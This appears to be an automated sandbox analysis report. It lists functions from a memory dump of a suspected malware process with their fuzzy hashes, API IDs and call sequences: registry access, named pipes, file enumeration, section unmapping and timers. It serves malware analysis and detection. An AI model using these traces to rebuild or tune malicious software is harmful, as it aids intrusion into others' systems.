  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C51AB, Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 438 Total matches: 26synchronizationmemorythread
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9BD6, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 208 Total matches: 54filememorytime
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7341, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76 Total matches: 75stringfilememory
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C178D, Relevance: 18.1, APIs: 12, Instructions: 117 Total matches: 53registrythreadsleep
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
